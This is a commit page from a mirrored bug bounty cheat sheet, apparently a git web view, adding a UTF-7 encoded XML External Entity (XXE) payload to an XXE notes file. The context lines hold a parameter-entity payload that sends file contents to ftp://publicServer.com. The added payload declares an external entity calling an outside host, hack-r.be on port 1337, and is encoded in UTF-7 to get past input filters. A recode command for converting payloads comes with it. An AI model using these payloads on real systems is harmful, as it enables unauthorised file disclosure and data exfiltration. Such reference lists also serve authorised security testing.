mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-22 02:53:06 +00:00
Update xxe.md
Added a utf-7 payload :)
This commit is contained in:
sxcurity
GitHub
parent
9ceb1b7053
commit
69ddac59b2
1 changed files with 9 additions and 0 deletions
|
|
@ -75,3 +75,12 @@ File stored on http://publicServer.com/parameterEntity_sendftp.dtd
|
|||
<!ENTITY % param1 "<!ENTITY % send SYSTEM 'ftp://publicServer.com/%payload;'>">
|
||||
%param1;
|
||||
```
|
||||
**XXE UTF-7**
|
||||
```
|
||||
<?xml version="1.0" encoding="UTF-7"?>
|
||||
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
|
||||
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
|
||||
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
|
||||
```
|
||||
To convert between UTF-8 & UTF-7 use recode.
|
||||
`recode UTF8..UTF7 payload-file.xml`
|
||||
|
|
|
|||
Loading…
Reference in a new issue